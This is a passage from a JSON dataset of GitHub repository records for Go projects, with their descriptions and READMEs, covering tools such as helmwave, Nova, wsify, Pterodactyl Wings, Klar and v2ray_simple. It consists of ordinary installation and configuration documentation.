\u76f8\u5173\u7cfb\u7edf\u53ef\u4ee5\u770b [beego cms] (https://github.com/Echosong/beego_element_cms)\n\n## \u7f16\u8bd1\u5b89\u88c5\u8bf4\u660e\uff1a\n\n1 . \u8bbe\u7f6eGOPATH(\u5b89\u88c5\u76ee\u5f55)\n\n $ export GOPATH=/path/to/\n\n\n2 . \u4e0b\u8f7d\u5b89\u88c5\n \n $ go get github.com/Echosong/beego_blog\n\n> \u6211\u4eec\u4f7f\u7528\u7248\u672c\u662fbeego 1.** \u7248\u672c\u7684\uff0c\u5efa\u8bae\u662f\u7528 \u5347\u7ea7 go get -u github.com/astaxie/beego\n\n4 . \u52a0\u5165\u6570\u636e\u5e93\n\n mysql \u65b0\u5efadb_beego\u6570\u636e\u5e93\u628a\u6839\u76ee\u5f55 db_beego.sql \u5bfc\u5165\n\n5 . \u4fee\u6539 app.conf \u914d\u7f6e\n\n #MYSQL\u5730\u5740\n dbhost = localhost\n\n #MYSQL\u7aef\u53e3\n dbport = 3306\n\n #MYSQL\u7528\u6237\u540d\n dbuser = root\n\n #MYSQL\u5bc6\u7801\n dbpassword =\n\n #MYSQL\u6570\u636e\u5e93\u540d\u79f0\n dbname = db_beego\n\n #MYSQL\u8868\u524d\u7f00\n dbprefix = tb_\n\n 6 . \u8fd0\u884c\n\n cd \u5230 beego_blog \u76ee\u5f55 \u6267\u884c\n $ bee run\n\n 7 . \u6d4f\u89c8\u5668\u6f14\u793a\n\nhttp://localhost:8099 (\u524d\u53f0)\n\nhttp://localhost:8099/admin/login (\u540e\u53f0)\n\n\n\n\n\n \u8d26\u53f7\uff1a admin \u5bc6\u7801 :123456\n\n 8 . \u8054\u7cfb\u65b9\u5f0f\n\n qq:313690636\n \n qq\u7fa4\uff1a 571627871\n\n\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "helmwave/helmwave", "link": "https://github.com/helmwave/helmwave", "tags": ["helm", "kubernetes", "chart"], "stars": 504, "description": "\ud83c\udf0a Helmwave is the true release manager", "lang": "Go", "repo_lang": "", "readme": "

\n \n

\n\n

Helmwave

\n\n

\n \n \"codecov\"/ \n \n \n \"CodeFactor\"\n \"GitHub\"\n \"GitHub\n

\n\n\n\ud83c\udf0a Helmwave is **[helm3](https://github.com/helm/helm/)-native** tool for deploy your Helm Charts.\nHelmWave is like docker-compose for helm.\n\n> We focus on speed execution, tiny size, pretty debugging.\n\nWith helmwave you will become a superhero:\n\n- Deploy multiple environments by one step\n- Separate values for environments\n- Common values for apps\n- Keep a directory of chart value files\n- Maintain changes in version control\n- Template values\n- Step by Step deployment (depends_on, allow_failure)\n- Live tracking kubernetes resources with kubedog\n- Fetch data from external datasource like vault, aws sm\n- ... and much more!\n\n## \ud83d\udcd6 [Documentation](https://docs.helmwave.app)\n\nDocumentation available at https://docs.helmwave.app\n\n\n## Community, discussion, contribution, and support\n\n- \n- [kanban](https://github.com/orgs/helmwave/projects/3)\n- [contribution guide](https://github.com/helmwave/helmwave/blob/main/CONTRIBUTING.md)\n- [security and vulnerabilities](https://github.com/helmwave/helmwave/blob/main/SECURITY.md)\n\n\n## Stargazers over time\n\n[![Stargazers over time](https://starchart.cc/helmwave/helmwave.svg)](https://starchart.cc/helmwave/helmwave)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "zhangpeihao/gortmp", "link": "https://github.com/zhangpeihao/gortmp", "tags": ["rtmp", "rtmp-server", "rtmp-player", "rtmpdump", "rtmp-protocol", "go"], "stars": 504, "description": "Implement RTMP protocol by golang", "lang": "Go", "repo_lang": "", "readme": "# GoRTMP [![Build Status](https://secure.travis-ci.org/zhangpeihao/gortmp.png)](http://travis-ci.org/zhangpeihao/gortmp)\n======\n\nRTMP protocol implementation.\n\n## Spec: \n* RTMP - http://www.adobe.com/devnet/rtmp.html\n* AMF0 - http://download.macromedia.com/pub/labs/amf/amf0_spec_121207.pdf\n* AMF3 - http://download.macromedia.com/pub/labs/amf/amf3_spec_121207.pdf\n\n\n## Todo:\n* Inbound side\n\n## Examples:\n\n```golang\n// To connect FMS server\nobConn, err := rtmp.Dial(url, handler, 100)\n\n// To connect\nerr = obConn.Connect()\n\n// When new stream created, handler event OnStreamCreated() would been called\nfunc (handler *TestOutboundConnHandler) OnStreamCreated(stream rtmp.OutboundStream) {\n\t// To play\n\terr = stream.Play(*streamName, nil, nil, nil)\n\t// Or publish\n\terr = stream.Publish(*streamName, \"live\")\n}\n\n// To publish data\nstream.PublishAudioData(data, deltaTimestamp)\n// or\nstream.PublishVideoData(data, deltaTimestamp)\n// or\nstream.PublishData(tagHeader.TagType, data, deltaTimestamp)\n\n// You can close stream by\nstream.Close()\n\n// You can close connection by\nobConn.Close()\n```", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "FairwindsOps/nova", "link": "https://github.com/FairwindsOps/nova", "tags": ["helm", "kubernetes", "updates", "fairwinds-official", "hacktoberfest"], "stars": 504, "description": "Find outdated or deprecated Helm charts running in your cluster.", "lang": "Go", "repo_lang": "", "readme": "
\n \"Nova\"\n
\n\n Find outdated or deprecated Helm charts running in your cluster.\n\n \n \n \n \n \n \n \n \n \n
\n\nNova scans your cluster for installed Helm charts, then cross-checks them against\nall known Helm repositories. If it finds an updated version of the chart you're using,\nor notices your current version is deprecated, it will let you know.\n\nNova can also scan your cluster for out of date container images. Find out more in the [docs](https://nova.docs.fairwinds.com).\n\n## Documentation\n\nCheck out the [documentation at docs.fairwinds.com](https://nova.docs.fairwinds.com)\n\n\n## Join the Fairwinds Open Source Community\n\nThe goal of the Fairwinds Community is to exchange ideas, influence the open source roadmap,\nand network with fellow Kubernetes users.\n[Chat with us on Slack](https://join.slack.com/t/fairwindscommunity/shared_invite/zt-e3c6vj4l-3lIH6dvKqzWII5fSSFDi1g)\nor\n[join the user group](https://www.fairwinds.com/open-source-software-user-group) to get involved!\n\n\n \"Love\n\n\n## Other Projects from Fairwinds\n\nEnjoying Nova? Check out some of our other projects:\n* [Polaris](https://github.com/FairwindsOps/Polaris) - Audit, enforce, and build policies for Kubernetes resources, including over 20 built-in checks for best practices\n* [Goldilocks](https://github.com/FairwindsOps/Goldilocks) - Right-size your Kubernetes Deployments by compare your memory and CPU settings against actual usage\n* [Pluto](https://github.com/FairwindsOps/Pluto) - Detect Kubernetes resources that have been deprecated or removed in future versions\n* [rbac-manager](https://github.com/FairwindsOps/rbac-manager) - Simplify the management of RBAC in your Kubernetes clusters\n\nOr [check out the full list](https://www.fairwinds.com/open-source-software?utm_source=nova&utm_medium=nova&utm_campaign=nova)\n## Fairwinds Insights\nIf you're interested in running Nova in multiple clusters,\ntracking the results over time, integrating with Slack, Datadog, and Jira,\nor unlocking other functionality, check out\n[Fairwinds Insights](https://fairwinds.com/pricing),\na platform for auditing and enforcing policy in Kubernetes clusters.\n\n\n \"Fairwinds\n\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "mdempsky/maligned", "link": "https://github.com/mdempsky/maligned", "tags": [], "stars": 504, "description": "Tool to detect Go structs that would take less memory if their fields were sorted.", "lang": "Go", "repo_lang": "", "readme": "**Deprecated:** Use https://pkg.go.dev/golang.org/x/tools/go/analysis/passes/fieldalignment instead.\n\nInstall:\n\n go get github.com/mdempsky/maligned\n\nUsage:\n\n maligned cmd/compile/internal/gc cmd/link/internal/ld\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "alash3al/wsify", "link": "https://github.com/alash3al/wsify", "tags": ["golang", "go", "redis-channel", "websockets", "backend", "realtime", "realtime-messaging", "pusher", "pubsub", "tiny", "pub", "websocket-service", "webhook", "topic"], "stars": 503, "description": "Just a tiny, simple and real-time self-hosted pub/sub messaging service", "lang": "Go", "repo_lang": "", "readme": "Websocketify (wsify) v2.0 [![StackShare](https://img.shields.io/badge/tech-stack-0690fa.svg?style=flat)](https://stackshare.io/alash3al/wsify)\n=========================\n> Just a tiny, simple and realtime pub/sub messaging service\n\n\n![Quick Demo](https://i.imgur.com/jxyejg0.gif)\n\nWhy\n====\n> I wanted to create a tiny solution that can replace `pusher` and similar services and learning more about the realtime world, so I dispatched this project.\n\nFeatures\n================\n- No dependencies, just a single binary !\n- Light and Tiny.\n- Event-Driven Design `webhooks`.\n- A client can listen on any resource.\n- You control whether a client is allowed to `connect`, `subscribe`, `unsubscribe` using any programming language !.\n- A client defines itself using `key` via the url query param i.e `?key=123`.\n- Send messages to only certain users.\n\n\nInstallation\n==============\n- **Docker ?** > `docker run --network host alash3al/wsify -listen :8080 -webhook \"http://localhost/wsify.php\"` \n- **Binary ?** > goto the [releases](https://github.com/alash3al/wsify/releases) page and download yours.\n- **From Source ?** > `go get -u github.com/alash3al/wsify`\n\nQuestions\n==========\n\n### (1)- How can a client/device connect to the websocket service?\n> by simply connecting to the following endpoint `ws://your.wsify.service:port/subscribe`\n\n### (2)- How can a client subscribe to a certain channel(s)/topic(s)?\n> after connecting to the main websocket service `/subscribe`, you can send a simple json payload `commands` to ask wsify to `subscribe`/`unsubscribe` you to/from any channel/topic you want!\n\n### (3)- What is the commands format?\n>\n```json\n{\n\t\"action\": \"subscribe\",\n\t\"value\": \"testchan\"\n}\n\n```\n\n### (4)- Can I control the client command so I can allow/disallow certain users?\n> Yes, each client can define itself using a query param `?key=client1`, this key will be passed to the `webhook` endpoint\nas well as the event being executed, and here is the event format:\n```javascript\n{\n\t// one of the following: connect|subscribe|unsubscribe|disconnect\n\t\"action\": \"subscribe\",\n\n\t// the channel if provided\n\t\"value\": \"testchan\",\n\n\t// the key provided by the client\n\t\"key\": \"client1\"\n}\n```\n\n### (5)- How can I publish message to i.e `testchan`?\n> Just a post request to `/publish` with the following format:\n```javascript\n{\n\t// the channel you want to publish to\n\t\"channel\": \"testchan\",\n\n\t// the data to be send (any format)\n\t\"payload\": \"testchan\",\n\n\t// array of clients \"keys\" (if you want certain clients only to receive the message)\n\t\"to\": []\n}\n```\ni.e\n```bash\ncurl -X POST \\\n\t-H \"Content-Type: application/json\" \\\n\t-d '{\"payload\": \"hi from the terminal\", \"channel\": \"testchan\"}' \\\n\thttp://localhost:4040/publish\n```\n\n### (6)- Can I skip the webhook events for testing?\n> Yes, `wsify --events=\"\"` empty events means \"NO WEBHOOK, WSIFY!\"\n\n### (7)- How can I secure the publish endpoint, so no one except me can publish ?!!\n> Easy :), Just change the endpoint to something more secure and hard to guess it is an alternative to access tokens .. etc, `wsify --publish=\"/broadcasteiru6chefoh1Yee0MohJ2um5eepaephies3zonai0Cae7quaeb\"`\n\n### (8)- What about other options?\n> `wsify --help` will help you !\n\n### (9)- What is the websocket client used in demos?\n> [Simple Websocket Client](https://chrome.google.com/webstore/detail/simple-websocket-client/pfdhoblngboilpfeibdedpjgfnlcodoo)\n\n### (10)- How I can use it over SSl/TLS with Nginx?\n> You can use proxy, add this lines on your Nginx configration\n```\n location /websocket/subscribe {\n proxy_pass http://localhost:4040/subscribe;\n proxy_http_version 1.1;\n proxy_set_header Upgrade $http_upgrade;\n proxy_set_header Connection \"Upgrade\";\n }\n```\nNow you can call websocket by `wss://yourdomain.com/websocket/subscribe` \n\n\n![Quick Demo2](https://i.imgur.com/f8xVwJU.gif)\n\nAuthor\n=============\nThis project has been created by [Mohamed Al Ashaal](http://github.com/alash3al) a Crazy Gopher ^^!\n\nContribution\n=============\n- Fork the Repo\n- Create a feature branch\n- Push your changes to the created branch\n- Create a pull request.\n\nLicense\n=============\nWsify is open-sourced software licensed under the [MIT License](LICENSE).\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "pterodactyl/wings", "link": "https://github.com/pterodactyl/wings", "tags": ["golang", "docker", "go", "pterodactyl", "compiled"], "stars": 503, "description": "The server control plane for Pterodactyl Panel. Written from the ground-up with security, speed, and stability in mind.", "lang": "Go", "repo_lang": "", "readme": "[![Logo Image](https://cdn.pterodactyl.io/logos/new/pterodactyl_logo.png)](https://pterodactyl.io)\n\n![Discord](https://img.shields.io/discord/122900397965705216?label=Discord&logo=Discord&logoColor=white)\n![GitHub Releases](https://img.shields.io/github/downloads/pterodactyl/wings/latest/total)\n[![Go Report Card](https://goreportcard.com/badge/github.com/pterodactyl/wings)](https://goreportcard.com/report/github.com/pterodactyl/wings)\n\n# Pterodactyl Wings\n\nWings is Pterodactyl's server control plane, built for the rapidly changing gaming industry and designed to be\nhighly performant and secure. Wings provides an HTTP API allowing you to interface directly with running server\ninstances, fetch server logs, generate backups, and control all aspects of the server lifecycle.\n\nIn addition, Wings ships with a built-in SFTP server allowing your system to remain free of Pterodactyl specific\ndependencies, and allowing users to authenticate with the same credentials they would normally use to access the Panel.\n\n## Sponsors\n\nI would like to extend my sincere thanks to the following sponsors for helping find Pterodactyl's development.\n[Interested in becoming a sponsor?](https://github.com/sponsors/matthewpi)\n\n| Company | About |\n|-----------------------------------------------------------|---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|\n| [**WISP**](https://wisp.gg) | Extra features. |\n| [**Aussie Server Hosts**](https://aussieserverhosts.com/) | No frills Australian Owned and operated High Performance Server hosting for some of the most demanding games serving Australia and New Zealand. |\n| [**BisectHosting**](https://www.bisecthosting.com/) | BisectHosting provides Minecraft, Valheim and other server hosting services with the highest reliability and lightning fast support since 2012. |\n| [**MineStrator**](https://minestrator.com/) | Looking for the most highend French hosting company for your minecraft server? More than 24,000 members on our discord trust us. Give us a try! |\n| [**Skynode**](https://www.skynode.pro/) | Skynode provides blazing fast game servers along with a top-notch user experience. Whatever our clients are looking for, we're able to provide it! |\n| [**VibeGAMES**](https://vibegames.net/) | VibeGAMES is a game server provider that specializes in DDOS protection for the games we offer. We have multiple locations in the US, Brazil, France, Germany, Singapore, Australia and South Africa. |\n| [**Pterodactyl Market**](https://pterodactylmarket.com/) | Pterodactyl Market is a one-and-stop shop for Pterodactyl. In our market, you can find Add-ons, Themes, Eggs, and more for Pterodactyl. |\n| [**UltraServers**](https://ultraservers.com/) | Deploy premium games hosting with the click of a button. Manage and swap games with ease and let us take care of the rest. We currently support Minecraft, Rust, ARK, 7 Days to Die, Garys MOD, CS:GO, Satisfactory and others. |\n| [**Realms Hosting**](https://realmshosting.com/) | Want to build your Gaming Empire? Use Realms Hosting today to kick start your game server hosting with outstanding DDOS Protection, 24/7 Support, Cheap Prices and a Custom Control Panel. | |\n\n## Documentation\n\n* [Panel Documentation](https://pterodactyl.io/panel/1.0/getting_started.html)\n* [Wings Documentation](https://pterodactyl.io/wings/1.0/installing.html)\n* [Community Guides](https://pterodactyl.io/community/about.html)\n* Or, get additional help [via Discord](https://discord.gg/pterodactyl)\n\n## Reporting Issues\n\nPlease use the [pterodactyl/panel](https://github.com/pterodactyl/panel) repository to report any issues or make\nfeature requests for Wings. In addition, the [security policy](https://github.com/pterodactyl/panel/security/policy) listed\nwithin that repository also applies to Wings.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "tmc/grpc-websocket-proxy", "link": "https://github.com/tmc/grpc-websocket-proxy", "tags": ["grpc", "grpc-gateway", "websocket", "proxy"], "stars": 503, "description": "A proxy to transparently upgrade grpc-gateway streaming endpoints to use websockets", "lang": "Go", "repo_lang": "", "readme": "# grpc-websocket-proxy\n\n[![GoDoc](https://godoc.org/github.com/tmc/grpc-websocket-proxy/wsproxy?status.svg)](http://godoc.org/github.com/tmc/grpc-websocket-proxy/wsproxy)\n\nWrap your grpc-gateway mux with this helper to expose streaming endpoints over websockets.\n\nOn the wire this uses newline-delimited json encoding of the messages.\n\nUsage:\n```diff\n\tmux := runtime.NewServeMux()\n\topts := []grpc.DialOption{grpc.WithInsecure()}\n\tif err := echoserver.RegisterEchoServiceHandlerFromEndpoint(ctx, mux, *grpcAddr, opts); err != nil {\n\t\treturn err\n\t}\n-\thttp.ListenAndServe(*httpAddr, mux)\n+\thttp.ListenAndServe(*httpAddr, wsproxy.WebsocketProxy(mux))\n```\n\n\n# wsproxy\n import \"github.com/tmc/grpc-websocket-proxy/wsproxy\"\n\nPackage wsproxy implements a websocket proxy for grpc-gateway backed services\n\n## Usage\n\n```go\nvar (\n\tMethodOverrideParam = \"method\"\n\tTokenCookieName = \"token\"\n)\n```\n\n#### func WebsocketProxy\n\n```go\nfunc WebsocketProxy(h http.Handler) http.HandlerFunc\n```\nWebsocketProxy attempts to expose the underlying handler as a bidi websocket\nstream with newline-delimited JSON as the content encoding.\n\nThe HTTP Authorization header is either populated from the\nSec-Websocket-Protocol field or by a cookie. The cookie name is specified by the\nTokenCookieName value.\n\nexample:\n\n Sec-Websocket-Protocol: Bearer, foobar\n\nis converted to:\n\n Authorization: Bearer foobar\n\nMethod can be overwritten with the MethodOverrideParam get parameter in the\nrequested URL\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "mingrammer/go-todo-rest-api-example", "link": "https://github.com/mingrammer/go-todo-rest-api-example", "tags": ["example", "rest-api", "tutorial", "practice-golang"], "stars": 503, "description": ":books: A RESTful API example for simple todo application with Go", "lang": "Go", "repo_lang": "", "readme": "# Go Todo REST API Example\nA RESTful API example for simple todo application with Go\n\nIt is a just simple tutorial or example for making simple RESTful API with Go using **gorilla/mux** (A nice mux library) and **gorm** (An ORM for Go)\n\n## Installation & Run\n```bash\n# Download this project\ngo get github.com/mingrammer/go-todo-rest-api-example\n```\n\nBefore running API server, you should set the database config with yours or set the your database config with my values on [config.go](https://github.com/mingrammer/go-todo-rest-api-example/blob/master/config/config.go)\n```go\nfunc GetConfig() *Config {\n\treturn &Config{\n\t\tDB: &DBConfig{\n\t\t\tDialect: \"mysql\",\n\t\t\tUsername: \"guest\",\n\t\t\tPassword: \"Guest0000!\",\n\t\t\tName: \"todoapp\",\n\t\t\tCharset: \"utf8\",\n\t\t},\n\t}\n}\n```\n\n```bash\n# Build and Run\ncd go-todo-rest-api-example\ngo build\n./go-todo-rest-api-example\n\n# API Endpoint : http://127.0.0.1:3000\n```\n\n## Structure\n```\n\u251c\u2500\u2500 app\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 app.go\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 handler // Our API core handlers\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 common.go // Common response functions\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 projects.go // APIs for Project model\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 tasks.go // APIs for Task model\n\u2502\u00a0\u00a0 \u2514\u2500\u2500 model\n\u2502\u00a0\u00a0 \u2514\u2500\u2500 model.go // Models for our application\n\u251c\u2500\u2500 config\n\u2502\u00a0\u00a0 \u2514\u2500\u2500 config.go // Configuration\n\u2514\u2500\u2500 main.go\n```\n\n## API\n\n#### /projects\n* `GET` : Get all projects\n* `POST` : Create a new project\n\n#### /projects/:title\n* `GET` : Get a project\n* `PUT` : Update a project\n* `DELETE` : Delete a project\n\n#### /projects/:title/archive\n* `PUT` : Archive a project\n* `DELETE` : Restore a project \n\n#### /projects/:title/tasks\n* `GET` : Get all tasks of a project\n* `POST` : Create a new task in a project\n\n#### /projects/:title/tasks/:id\n* `GET` : Get a task of a project\n* `PUT` : Update a task of a project\n* `DELETE` : Delete a task of a project\n\n#### /projects/:title/tasks/:id/complete\n* `PUT` : Complete a task of a project\n* `DELETE` : Undo a task of a project\n\n## Todo\n\n- [x] Support basic REST APIs.\n- [ ] Support Authentication with user for securing the APIs.\n- [ ] Make convenient wrappers for creating API handlers.\n- [ ] Write the tests for all APIs.\n- [x] Organize the code with packages\n- [ ] Make docs with GoDoc\n- [ ] Building a deployment process \n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "optiopay/klar", "link": "https://github.com/optiopay/klar", "tags": ["security", "clair", "severity-vulnerabilities", "docker-registry", "docker-image", "security-audit"], "stars": 503, "description": "Integration of Clair and Docker Registry", "lang": "Go", "repo_lang": "", "readme": "# Klar\nIntegration of Clair and Docker Registry (supports both Clair API v1 and v3)\n\nKlar is a simple tool to analyze images stored in a private or public Docker registry for security vulnerabilities using Clair https://github.com/coreos/clair. Klar is designed to be used as an integration tool so it relies on enviroment variables. It's a single binary which requires no dependencies.\n\nKlar serves as a client which coordinates the image checks between the Docker registry and Clair.\n\n## Binary installation\n\nThe simplest way is to download the latest release (for OSX and Linux) from https://github.com/optiopay/klar/releases/ and put the binary in a folder in your `PATH` (make sure it has execute permission).\n\n## Installation from source code\n\nMake sure you have Go language compiler installed and configured https://golang.org/doc/install\n\nThen run\n\n go get github.com/optiopay/klar\n\nmake sure your Go binary folder is in your `PATH` (e.g. `export PATH=$PATH:/usr/local/go/bin`)\n\n\n## Usage\n\nKlar process returns if `0` if the number of detected high severity vulnerabilities in an image is less than or equal to a threshold (see below) and `1` if there were more. It will return `2` if an error has prevented the image from being analyzed.\n\nKlar can be configured via the following environment variables:\n\n* `CLAIR_ADDR` - address of Clair server. It has a form of `protocol://host:port` - `protocol` and `port` default to `http` and `6060` respectively and may be omitted. You can also specify basic authentication in the URL: `protocol://login:password@host:port`.\n\n* `CLAIR_OUTPUT` - severity level threshold, vulnerabilities with severity level higher than or equal to this threshold\nwill be outputted. Supported levels are `Unknown`, `Negligible`, `Low`, `Medium`, `High`, `Critical`, `Defcon1`.\nDefault is `Unknown`.\n\n* `CLAIR_THRESHOLD` - how many outputted vulnerabilities Klar can tolerate before returning `1`. Default is `0`.\n\n* `CLAIR_TIMEOUT` - timeout in minutes before Klar cancels the image scanning. Default is `1`\n\n* `DOCKER_USER` - Docker registry account name.\n\n* `DOCKER_PASSWORD` - Docker registry account password.\n\n* `DOCKER_TOKEN` - Docker registry account token. (Can be used in place of `DOCKER_USER` and `DOCKER_PASSWORD`)\n\n* `DOCKER_INSECURE` - Allow Klar to access registries with bad SSL certificates. Default is `false`. Clair will\nneed to be booted with `-insecure-tls` for this to work.\n\n* `DOCKER_TIMEOUT` - timeout in minutes when trying to fetch layers from a docker registry\n\n* `DOCKER_PLATFORM_OS` - The operating system of the Docker image. Default is `linux`. This only needs to be set if the image specified references a Docker ManifestList instead of a usual manifest.\n\n* `DOCKER_PLATFORM_ARCH` - The architecture the Docker image is optimized for. Default is `amd64`. This only needs to be set if the image specified references a Docker ManifestList instead of a usual manifest.\n\n* `REGISTRY_INSECURE` - Allow Klar to access insecure registries (HTTP only). Default is `false`.\n\n* `JSON_OUTPUT` - Output JSON, not plain text. Default is `false`.\n\n* `FORMAT_OUTPUT` - Output format of the vulnerabilities. Supported formats are `standard`, `json`, `table`. Default is `standard`. If `JSON_OUTPUT` is set to true, this option is ignored.\n\n* `WHITELIST_FILE` - Path to the YAML file with the CVE whitelist. Look at `whitelist-example.yaml` for the file format.\n\n* `IGNORE_UNFIXED` - Do not count vulnerabilities without a fix towards the threshold\n\nUsage:\n\n CLAIR_ADDR=localhost CLAIR_OUTPUT=High CLAIR_THRESHOLD=10 DOCKER_USER=docker DOCKER_PASSWORD=secret klar postgres:9.5.1\n\n### Debug Output\nYou can enable more verbose output but setting `KLAR_TRACE` to true.\n* run `export KLAR_TRACE=true` to persist between runs.\n\n## Dockerized version\n\nKlar can be dockerized. Go to `$GOPATH/src/github.com/optiopay/klar` and build Klar in project root. If you are on Linux:\n\n CGO_ENABLED=0 go build -a -installsuffix cgo .\n\nIf you are on Mac don't forget to build it for Linux:\n\n GOOS=linux go build .\n\nTo build Docker image run in the project root (replace `klar` with fully qualified name if you like):\n\n docker build -t klar .\n\nThen pass env vars as separate `--env` arguments, or create an env file and pass it as `--env-file` argument. For example save env vars as `my-klar.env`:\n\n CLAIR_ADDR=localhost\n CLAIR_OUTPUT=High\n CLAIR_THRESHOLD=10\n DOCKER_USER=docker\n DOCKER_PASSWORD=secret\n\nThen run\n\n docker run --env-file=my-klar.env klar postgres:9.5.1\n\n## Amazon ECR support\nThere is no permanent username/password for Amazon ECR, the credentials must be retrived using `aws ecr get-login` and they are valid for 12 hours. Here is a sample script which may be used to provide Klar with ECR credentials:\n\n DOCKER_LOGIN=`aws ecr get-login --no-include-email`\n PASSWORD=`echo $DOCKER_LOGIN | cut -d' ' -f6`\n REGISTRY=`echo $DOCKER_LOGIN | cut -d' ' -f7 | sed \"s/https:\\/\\///\"`\n DOCKER_USER=AWS DOCKER_PASSWORD=${PASSWORD} ./klar ${REGISTRY}/my-image\n\n## Google GCR support\nFor authentication against GCR (Google Cloud Registry), the easiest way is to use the [application default credentials](https://developers.google.com/identity/protocols/application-default-credentials). These only work when running Klar from GCP. The only requirement is the Google Cloud SDK.\n\n DOCKER_USER=oauth2accesstoken\n DOCKER_PASSWORD=\"$(gcloud auth application-default print-access-token)\"\n\nWith Docker:\n\n DOCKER_USER=oauth2accesstoken\n DOCKER_PASSWORD=\"$(docker run --rm google/cloud-sdk:alpine gcloud auth application-default print-access-token)\"\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "e1732a364fed/v2ray_simple", "link": "https://github.com/e1732a364fed/v2ray_simple", "tags": ["gobwas", "golang", "grpc", "hysteria", "quic", "trojan", "utls", "v2ray", "grpcsimple", "http2", "vpn", "fallback", "geoip", "geosite", "websocket", "ws", "simplesocks", "shadowtls"], "stars": 503, "description": "a verysimple proxy", "lang": "Go", "repo_lang": "", "readme": "![GoVersion][10] [![GoDoc][1]][2] [![MIT licensed][3]][4] [![Go Report Card][5]][6] [![Downloads ][7]][8] [![release][9]][8]\n\n[1]: https://pkg.go.dev/badge/github.com/e1732a364fed/v2ray_simple.svg\n[2]: https://pkg.go.dev/github.com/e1732a364fed/v2ray_simple#section-readme\n[3]: https://img.shields.io/badge/license-MIT-blue.svg\n[4]: LICENSE\n[5]: https://goreportcard.com/badge/github.com/e1732a364fed/v2ray_simple\n[6]: https://goreportcard.com/report/github.com/e1732a364fed/v2ray_simple\n[7]: https://img.shields.io/github/downloads/e1732a364fed/v2ray_simple/total.svg\n[8]: https://github.com/e1732a364fed/v2ray_simple/releases/latest\n[9]: https://img.shields.io/github/release/e1732a364fed/v2ray_simple/all.svg?style=flat-square\n[10]: https://img.shields.io/github/go-mod/go-version/e1732a364fed/v2ray_simple?style=flat-square\n\n## latest news\n\nThe vsb project already supports the Android VPN function:\nhttps://github.com/e1732a364fed/vsb/releases\n\n#verysimple\n\nverysimple, in fact, the homonym comes from V2ray Simple (obviously only applicable to Chinese native speakers), which means extremely simple.\n\nOnly the project name is v2ray_simple, all other occasions use the name verysimple, which can be referred to as \"vs\".\n\nverysimple is a proxy kernel, benchmarked against v2ray/xray, with rich functions, lightweight, minimalist, user-friendly, and novice-oriented.\n\nThe basic advantages of verysimple are small files, small memory usage, fast speed, and simple and easy to write configuration file format. Compared with v2ray's nested json configuration format, our VS configuration format is completely flat, without so many curly braces\n\nvs simplifies the forwarding mechanism and can improve the running speed. And some users report that the memory usage is 1/3 smaller than that of v2ray/xray.\n\nSome highlights of VS are full-protocol readv acceleration, lazy technology, vless v1, hysteria blocking control, wider utls support, grpc fallback, interactive mode, etc.\n\nThis work takes learning programming technology as the main goal, uses its own code to realize all the good functions of v2ray, discards poor or too complicated functions that cannot be understood or cannot be used by Xiaobai, and uses a simpler architecture developed by itself , combined with self-developed new technologies, to achieve overtaking.\n\nVS is neither a superset nor a subset of v2ray/xray. It belongs to parallel kernels and has intersections. Because VS uses its own architecture, it does not directly come from v2ray. It is somewhat similar to the relationship between unix and linux.\n\n\n## Supported features\n\n[win/mac/linux sockopt.device(bindToDevice)]/tcp/udp (and fullcone)/unix domain socket, PROXY protocol v1/v2 monitoring, splice/readv\n\ntls (including generating random certificates; client certificate verification; rejectUnknownSni), uTls, shadowTls(v1/v2), **\u3010tls lazy encrypt\u3011**,\n\nhttp masquerade header (**can support fallback**)/ws (and earlydata)/grpc (and multiMode, uTls, and **grpcSimple** that supports fallback)/quic (and **hy block control, manual block** and 0-rtt)/smux,\n\nsocks5 (including udp associate and user password)/http (and user password)/socks5http (equivalent to clash's mixed)/dokodemo/tproxy/tun/trojan/simplesocks/vless(v0/**v1**)/vmess/ shadowsocks, multi-user, http headers\n\ndns(udp/tls)/route(geoip/geosite, diversion function is completely equivalent to v2ray)/fallback(path/sni/alpn/PROXY protocol v1/v2), sniffing(tls)\n\ncli(**interactive mode**)/**gui/[vsb plan](https://github.com/e1732a364fed/vsb)(panel written by flutter)**/apiServer, Docker, docker-compose.\n\n\nIn order not to scare Xiaobai away, this README puts the installation and usage methods in the front. If you want to read the technical introduction of this work directly, click Jump -> [Innovation Point](# Innovation Point)\n\n\n\n## Installation method:\n\n### Download and install\n\nIf it is a linux server, please refer to the guide article [install.md](docs/install.md).\n\nFor the computer client, just download it directly from [release](https://github.com/e1732a364fed/v2ray_simple/releases).\n\nStarting from v1.2.5, this work also releases the vs_gui series, including gui, tun, etc., for computer clients.\n\n#### client's geoip and geosite\n\nNote that if you want to divert geoip and want your own mmdb file (for high-level players), you must also download mmdb;\n\n\nBy default, if the -d parameter is added, the mmdb file and the geosite folder will be automatically downloaded, and if you specify a configuration file and your node is available, these two files will be automatically downloaded through your node, so don't be afraid blocked.\n\nIf you don't use the -d parameter, you can download it in interactive mode, or download it with the following command\n\n```sh\n#In the directory where the verysimple executable file is located\ngit clone 